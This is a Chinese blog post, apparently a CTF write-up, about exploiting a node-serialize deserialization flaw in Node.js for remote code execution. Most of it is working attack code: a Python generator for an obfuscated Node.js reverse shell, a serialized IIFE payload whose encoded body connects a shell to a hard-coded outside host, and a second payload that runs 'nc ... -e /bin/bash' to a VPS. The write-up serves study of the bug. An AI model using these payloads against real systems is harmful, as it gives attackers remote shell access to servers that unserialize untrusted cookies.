<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">



  <meta name="description" content="nodejs反序列化漏洞"/>




  <meta name="keywords" content="nodejs, unserialize, shell, IIFE, 八一" />



  <meta name="baidu-site-verification" content="HhUstaSjr0" />



  <meta name="google-site-verification" content="UA-102975942-1" />






  <link rel="alternate" href="/atom.xml" title="八一">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.6.0" />



<link rel="canonical" href="https://bay1.top/2017/05/18/nodejs反序列化漏洞/"/>


<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.6.0" />
<link rel="stylesheet" type="text/css" href="/css/prettify.css" media="screen" />
<link rel="stylesheet" type="text/css" href="/css/sons-of-obsidian.css" media="screen" />



  <link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />




  
  <script id="baidu_analytics">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?9a885cc9fb6cd7bcef579deb8efe8a70";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>



  <script id="google_analytics">
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

        ga('create', 'UA-102975942-1', 'auto');
        ga('send', 'pageview');
  </script>










    <title> nodejs反序列化漏洞 - 八一 </title>
  </head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">八一</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    
      <a href="/archives">
        <li class="mobile-menu-item">
          
          
            文章
          
        </li>
      </a>
    
      <a href="/tags">
        <li class="mobile-menu-item">
          
          
            标签
          
        </li>
      </a>
    
      <a href="/about">
        <li class="mobile-menu-item">
          
          
            关于/友链
          
        </li>
      </a>
    
      <a href="/search">
        <li class="mobile-menu-item">
          
          
            站内搜索
          
        </li>
      </a>
    
  </ul>
</nav>

    <div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">八一</a>
</div>

<nav class="site-navbar">
  
    <ul id="menu" class="menu">
      
        <li class="menu-item">
          <a class="menu-item-link" href="/archives">
            
            
              文章
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/tags">
            
            
              标签
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/about">
            
            
              关于/友链
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/search">
            
            
              站内搜索
            
          </a>
        </li>
      
    </ul>
  
</nav>

      </header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content">
            
  
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          nodejs反序列化漏洞
        
      </h1>

      <div class="post-meta">
        <span class="post-time">
          2017-05-18
        </span>
        
        
        
      </div>
    </header>

    
    
  <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞代码"><span class="toc-text">漏洞代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#反弹shell的脚本"><span class="toc-text">反弹shell的脚本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#序列化"><span class="toc-text">序列化</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#另一种"><span class="toc-text">另一种</span></a></li></ol>
    </div>
  </div>


    <div class="post-content">
      
        <p>漏洞名称:Exploiting Node.js deserialization bug for Remote Code Execution <a id="more"></a></p>
<blockquote>
<p>漏洞简介：<br>不可信的数据传入了unserialize()函数，这导致我们可以通过传递带有立即调用函数表达式（IIFE）的JavaScript对象来实现任意代码执行。</p>
</blockquote>
<h2 id="漏洞代码"><a href="#漏洞代码" class="headerlink" title="漏洞代码"></a>漏洞代码</h2><blockquote>
<p><a href="http://pan.baidu.com/s/1i5vDMNb" target="_blank" rel="noopener">网站源码</a>,提取密码：qp6n<br>这是用户路由</p>
</blockquote>
<figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">router.get(<span class="string">'/admin'</span>, <span class="function"><span class="keyword">function</span><span class="params">(req, res, next)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">var</span> passwd= config.secret_password;</span><br><span class="line">    <span class="keyword">var</span> obj = serialize.unserialize(<span class="keyword">new</span> Buffer(req.cookies.session, <span class="string">'base64'</span>).toString()); </span><br><span class="line">    res.render(<span class="string">'admin'</span>, &#123; title: <span class="string">'Admin area'</span>, admin: obj.admin, pass: passwd &#125;);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>
<blockquote>
<p>问题代码处于第三行，可以看出这段代码会对传入的cookies进行反序列化<br>所以可以传入构造好的序列化代码进行利用</p>
</blockquote>
<h2 id="反弹shell的脚本"><a href="#反弹shell的脚本" class="headerlink" title="反弹shell的脚本"></a>反弹shell的脚本</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="comment"># Generator for encoded NodeJS reverse shells</span></span><br><span class="line"><span class="comment"># Based on the NodeJS reverse shell by Evilpacket</span></span><br><span class="line"><span class="comment"># https://github.com/evilpacket/node-shells/blob/master/node_revshell.js</span></span><br><span class="line"><span class="comment"># Onelineified and suchlike by infodox (and felicity, who sat on the keyboard)</span></span><br><span class="line"><span class="comment"># Insecurety Research (2013) - insecurety.net</span></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">if</span> len(sys.argv) != <span class="number">3</span>:</span><br><span class="line">    <span class="keyword">print</span> (<span class="string">"Usage: %s &lt;LHOST&gt; &lt;LPORT&gt;"</span> % (sys.argv[<span class="number">0</span>]))</span><br><span class="line">    sys.exit(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">IP_ADDR = sys.argv[<span class="number">1</span>]</span><br><span class="line">PORT = sys.argv[<span class="number">2</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">charencode</span><span class="params">(string)</span>:</span></span><br><span class="line">    <span class="string">"""String.CharCode"""</span></span><br><span class="line">    encoded = <span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> char <span class="keyword">in</span> string:</span><br><span class="line">        encoded = encoded + <span class="string">","</span> + str(ord(char))</span><br><span class="line">    <span class="keyword">return</span> encoded[<span class="number">1</span>:]</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> (<span class="string">"[+] LHOST = %s"</span> % (IP_ADDR))</span><br><span class="line"><span class="keyword">print</span> (<span class="string">"[+] LPORT = %s"</span> % (PORT))</span><br><span class="line">NODEJS_REV_SHELL = <span class="string">'''</span></span><br><span class="line"><span class="string">var net = require('net');</span></span><br><span class="line"><span class="string">var spawn = require('child_process').spawn;</span></span><br><span class="line"><span class="string">HOST="%s";</span></span><br><span class="line"><span class="string">PORT="%s";</span></span><br><span class="line"><span class="string">TIMEOUT="5000";</span></span><br><span class="line"><span class="string">if (typeof String.prototype.contains === 'undefined') &#123; String.prototype.contains = function(it) &#123; return this.indexOf(it) != -1; &#125;; &#125;</span></span><br><span class="line"><span class="string">function c(HOST,PORT) &#123;</span></span><br><span class="line"><span class="string">    var client = new net.Socket();</span></span><br><span class="line"><span class="string">    client.connect(PORT, HOST, function() &#123;</span></span><br><span class="line"><span class="string">        var sh = spawn('/bin/sh',[]);</span></span><br><span class="line"><span class="string">        client.write("Connected!\\n");</span></span><br><span class="line"><span class="string">        client.pipe(sh.stdin);</span></span><br><span class="line"><span class="string">        sh.stdout.pipe(client);</span></span><br><span class="line"><span class="string">        sh.stderr.pipe(client);</span></span><br><span class="line"><span class="string">        sh.on('exit',function(code,signal)&#123;</span></span><br><span class="line"><span class="string">          client.end("Disconnected!\\n");</span></span><br><span class="line"><span class="string">        &#125;);</span></span><br><span class="line"><span class="string">    &#125;);</span></span><br><span class="line"><span class="string">    client.on('error', function(e) &#123;</span></span><br><span class="line"><span class="string">        setTimeout(c(HOST,PORT), TIMEOUT);</span></span><br><span class="line"><span class="string">    &#125;);</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">c(HOST,PORT);</span></span><br><span class="line"><span class="string">'''</span> % (IP_ADDR, PORT)</span><br><span class="line"><span class="keyword">print</span> (<span class="string">"[+] Encoding"</span>)</span><br><span class="line">PAYLOAD = charencode(NODEJS_REV_SHELL)</span><br><span class="line"><span class="keyword">print</span> (<span class="string">"eval(String.fromCharCode(%s))"</span> % (PAYLOAD))</span><br></pre></td></tr></table></figure>
<h2 id="序列化"><a href="#序列化" class="headerlink" title="序列化"></a>序列化</h2><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> y = &#123;</span><br><span class="line">rce : <span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;<span class="built_in">eval</span>(<span class="built_in">String</span>.fromCharCode(<span class="number">10</span>,<span class="number">118</span>,<span class="number">97</span>,<span class="number">114</span>,<span class="number">32</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">114</span>,<span class="number">101</span>,<span class="number">113</span>,<span class="number">117</span>,<span class="number">105</span>,<span class="number">114</span>,<span class="number">101</span>,<span class="number">40</span>,<span class="number">39</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">39</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">118</span>,<span class="number">97</span>,<span class="number">114</span>,<span class="number">32</span>,<span class="number">115</span>,<span class="number">112</span>,<span class="number">97</span>,<span class="number">119</span>,<span class="number">110</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">114</span>,<span class="number">101</span>,<span class="number">113</span>,<span class="number">117</span>,<span class="number">105</span>,<span class="number">114</span>,<span class="number">101</span>,<span class="number">40</span>,<span class="number">39</span>,<span class="number">99</span>,<span class="number">104</span>,<span class="number">105</span>,<span class="number">108</span>,<span class="number">100</span>,<span class="number">95</span>,<span class="number">112</span>,<span class="number">114</span>,<span class="number">111</span>,<span class="number">99</span>,<span class="number">101</span>,<span class="number">115</span>,<span class="number">115</span>,<span class="number">39</span>,<span class="number">41</span>,<span class="number">46</span>,<span class="number">115</span>,<span class="number">112</span>,<span class="number">97</span>,<span class="number">119</span>,<span class="number">110</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">72</span>,<span class="number">79</span>,<span class="number">83</span>,<span class="number">84</span>,<span class="number">61</span>,<span class="number">34</span>,<span class="number">110</span>,<span class="number">111</span>,<span class="number">100</span>,<span class="number">101</span>,<span class="number">46</span>,<span class="number">98</span>,<span class="number">120</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">101</span>,<span class="number">97</span>,<span class="number">109</span>,<span class="number">46</span>,<span class="number">120</span>,<span class="number">121</span>,<span class="number">122</span>,<span class="number">34</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">80</span>,<span class="number">79</span>,<span class="number">82</span>,<span class="number">84</span>,<span class="number">61</span>,<span class="number">34</span>,<span class="number">50</span>,<span class="number">51</span>,<span class="number">51</span>,<span class="number">51</span>,<span class="number">34</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">84</span>,<span class="number">73</span>,<span class="number">77</span>,<span class="number">69</span>,<span class="number">79</span>,<span class="number">85</span>,<span class="number">84</span>,<span class="number">61</span>,<span class="number">34</span>,<span class="number">53</span>,<span class="number">48</span>,<span class="number">48</span>,<span class="number">48</span>,<span class="number">34</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">105</span>,<span class="number">102</span>,<span class="number">32</span>,<span class="number">40</span>,<span class="number">116</span>,<span class="number">121</span>,<span class="number">112</span>,<span class="number">101</span>,<span class="number">111</span>,<span class="number">102</span>,<span class="number">32</span>,<span class="number">83</span>,<span class="number">116</span>,<span class="number">114</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">103</span>,<span class="number">46</span>,<span class="number">112</span>,<span class="number">114</span>,<span class="number">111</span>,<span class="number">116</span>,<span class="number">111</span>,<span class="number">116</span>,<span class="number">121</span>,<span class="number">112</span>,<span class="number">101</span>,<span class="number">46</span>,<span class="number">99</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">97</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">61</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">39</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">100</span>,<span class="number">101</span>,<span class="number">102</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">100</span>,<span class="number">39</span>,<span class="number">41</span>,<span class="number">32</span>,<span class="number">123</span>,<span class="number">32</span>,<span class="number">83</span>,<span class="number">116</span>,<span class="number">114</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">103</span>,<span class="number">46</span>,<span class="number">112</span>,<span class="number">114</span>,<span class="number">111</span>,<span class="number">116</span>,<span class="number">111</span>,<span class="number">116</span>,<span class="number">121</span>,<span class="number">112</span>,<span class="number">101</span>,<span class="number">46</span>,<span class="number">99</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">97</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">40</span>,<span class="number">105</span>,<span class="number">116</span>,<span class="number">41</span>,<span class="number">32</span>,<span class="number">123</span>,<span class="number">32</span>,<span class="number">114</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">117</span>,<span class="number">114</span>,<span class="number">110</span>,<span class="number">32</span>,<span class="number">116</span>,<span class="number">104</span>,<span class="number">105</span>,<span class="number">115</span>,<span class="number">46</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">100</span>,<span class="number">101</span>,<span class="number">120</span>,<span class="number">79</span>,<span class="number">102</span>,<span class="number">40</span>,<span class="number">105</span>,<span class="number">116</span>,<span class="number">41</span>,<span class="number">32</span>,<span class="number">33</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">45</span>,<span class="number">49</span>,<span class="number">59</span>,<span class="number">32</span>,<span class="number">125</span>,<span class="number">59</span>,<span class="number">32</span>,<span class="number">125</span>,<span class="number">10</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">32</span>,<span class="number">99</span>,<span class="number">40</span>,<span class="number">72</span>,<span class="number">79</span>,<span class="number">83</span>,<span class="number">84</span>,<span class="number">44</span>,<span class="number">80</span>,<span class="number">79</span>,<span class="number">82</span>,<span class="number">84</span>,<span class="number">41</span>,<span class="number">32</span>,<span class="number">123</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">118</span>,<span class="number">97</span>,<span class="number">114</span>,<span class="number">32</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">119</span>,<span class="number">32</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">83</span>,<span class="number">111</span>,<span class="number">99</span>,<span class="number">107</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">40</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">99</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">40</span>,<span class="number">80</span>,<span class="number">79</span>,<span class="number">82</span>,<span class="number">84</span>,<span class="number">44</span>,<span class="number">32</span>,<span class="number">72</span>,<span class="number">79</span>,<span class="number">83</span>,<span class="number">84</span>,<span class="number">44</span>,<span class="number">32</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">40</span>,<span class="number">41</span>,<span class="number">32</span>,<span class="number">123</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">118</span>,<span class="number">97</span>,<span class="number">114</span>,<span class="number">32</span>,<span class="number">115</span>,<span class="number">104</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">115</span>,<span class="number">112</span>,<span class="number">97</span>,<span class="number">119</span>,<span class="number">110</span>,<span class="number">40</span>,<span class="number">39</span>,<span class="number">47</span>,<span class="number">98</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">47</span>,<span class="number">115</span>,<span class="number">104</span>,<span class="number">39</span>,<span class="number">44</span>,<span class="number">91</span>,<span class="number">93</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">119</span>,<span class="number">114</span>,<span class="number">105</span>,<span class="number">116</span>,<span class="number">101</span>,<span class="number">40</span>,<span class="number">34</span>,<span class="number">67</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">101</span>,<span class="number">100</span>,<span class="number">33</span>,<span class="number">92</span>,<span class="number">110</span>,<span class="number">34</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">112</span>,<span class="number">105</span>,<span class="number">112</span>,<span class="number">101</span>,<span class="number">40</span>,<span class="number">115</span>,<span class="number">104</span>,<span class="number">46</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">100</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">115</span>,<span class="number">104</span>,<span class="number">46</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">100</span>,<span class="number">111</span>,<span class="number">117</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">112</span>,<span class="number">105</span>,<span class="number">112</span>,<span class="number">101</span>,<span class="number">40</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">115</span>,<span class="number">104</span>,<span class="number">46</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">100</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">114</span>,<span class="number">46</span>,<span class="number">112</span>,<span class="number">105</span>,<span class="number">112</span>,<span class="number">101</span>,<span class="number">40</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">115</span>,<span class="number">104</span>,<span class="number">46</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">40</span>,<span class="number">39</span>,<span class="number">101</span>,<span class="number">120</span>,<span class="number">105</span>,<span class="number">116</span>,<span class="number">39</span>,<span class="number">44</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">40</span>,<span class="number">99</span>,<span class="number">111</span>,<span class="number">100</span>,<span class="number">101</span>,<span class="number">44</span>,<span class="number">115</span>,<span class="number">105</span>,<span class="number">103</span>,<span class="number">110</span>,<span class="number">97</span>,<span class="number">108</span>,<span class="number">41</span>,<span class="number">123</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">100</span>,<span class="number">40</span>,<span class="number">34</span>,<span class="number">68</span>,<span class="number">105</span>,<span class="number">115</span>,<span class="number">99</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">101</span>,<span class="number">100</span>,<span class="number">33</span>,<span class="number">92</span>,<span class="number">110</span>,<span class="number">34</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">125</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">125</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">40</span>,<span class="number">39</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">114</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">39</span>,<span class="number">44</span>,<span class="number">32</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">40</span>,<span class="number">101</span>,<span class="number">41</span>,<span class="number">32</span>,<span class="number">123</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">115</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">84</span>,<span class="number">105</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">111</span>,<span class="number">117</span>,<span class="number">116</span>,<span class="number">40</span>,<span class="number">99</span>,<span class="number">40</span>,<span class="number">72</span>,<span class="number">79</span>,<span class="number">83</span>,<span class="number">84</span>,<span class="number">44</span>,<span class="number">80</span>,<span class="number">79</span>,<span class="number">82</span>,<span class="number">84</span>,<span class="number">41</span>,<span class="number">44</span>,<span class="number">32</span>,<span class="number">84</span>,<span class="number">73</span>,<span class="number">77</span>,<span class="number">69</span>,<span class="number">79</span>,<span class="number">85</span>,<span class="number">84</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">125</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">125</span>,<span class="number">10</span>,<span class="number">99</span>,<span class="number">40</span>,<span class="number">72</span>,<span class="number">79</span>,<span class="number">83</span>,<span class="number">84</span>,<span class="number">44</span>,<span class="number">80</span>,<span class="number">79</span>,<span class="number">82</span>,<span class="number">84</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>))&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">var</span> serialize = <span class="built_in">require</span>(<span class="string">'node-serialize'</span>);</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"Serialized: \n"</span> + serialize.serialize(y));</span><br></pre></td></tr></table></figure>
<blockquote>
<p>生成反序列化的 payload，在函数后面添加 IIFE 括号 ()<br>至于为什么要加IIFE括号，在unserialize 内部这段代码</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (obj[key].indexOf(<span class="string">'_$$ND_FUNC$$_'</span>) === <span class="number">0</span>) &#123;</span><br><span class="line">  obj[key] = eval(<span class="string">'('</span> + obj[key].substring(<span class="string">'_$$ND_FUNC$$_'</span>.length) + <span class="string">')'</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>IIFE是JS的立即调用函数表达式,如果我们在函数体之后使用IIFE括号（），当对象被创建时，函数将被调用<br>代码执行恰好就是 eval 中的这俩括号构成 IIFE</p>
</blockquote>
<p>生成payload之后，base64放入cookie，再用vps监听端口反弹shell（这是淮工一个学长的方法，比赛时我也这样做没成功，比赛后看了他wp我还没复现成功，不知为何。。。一反弹就挂。下面是他成功的图）</p>
<p><img src="https://s1.ax1x.com/2018/01/01/pSW98e.png" alt="shell"></p>
<h2 id="另一种"><a href="#另一种" class="headerlink" title="另一种"></a>另一种</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="string">"rce"</span>:<span class="string">"_$$ND_FUNC$$_function ()&#123;\n</span></span><br><span class="line"><span class="string">require('child_process').exec('nc 你的vps vps的端口 -e /bin/bash', function(error,\nstdout, stderr) &#123; </span></span><br><span class="line"><span class="string">console.log(stdout) &#125;);\n&#125;()"</span>&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>下面的操作和上面的相同</p>
</blockquote>
